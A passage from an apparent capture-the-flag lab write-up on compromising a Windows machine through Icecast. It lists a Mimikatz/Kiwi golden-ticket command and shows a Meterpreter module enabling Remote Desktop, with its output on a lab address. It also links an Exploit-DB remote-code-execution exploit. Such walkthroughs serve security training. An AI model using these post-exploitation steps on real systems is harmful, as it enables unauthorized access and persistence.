1
2
3
4
5
6
7
Kiwi Commands
=============
Command Description
------- -----------
golden_ticke Create a golden kerberos ticket
t_create
One last thing to note. As we have the password for the user ‘Dark’ we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we’d likely kick whatever user is signed onto it off if we connect to it, however, it’s always interesting to remote into machines and view them as their users do. If this hasn’t already been enabled, we can enable it via the following Metasploit module: run post/windows/manage/enable_rdp
1
2
3
4
5
6
7
8
9
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230729082734_default_10.10.184.85_host.windows.cle_785848.txt
Extra Credit
Explore manual exploitation via exploit code found on exploit-db.
Exploit link: https://www.exploit-db.com/exploits/568
As you advance in your pentesting skills, you will be faced eventually with exploitation without the usage of Metasploit. Provided above is the link to one of the exploits found on Exploit DB for hijacking Icecast for remote code execution. While not required by the room, it’s recommended to attempt exploitation via the provided code or via another similar exploit to further hone your skills.
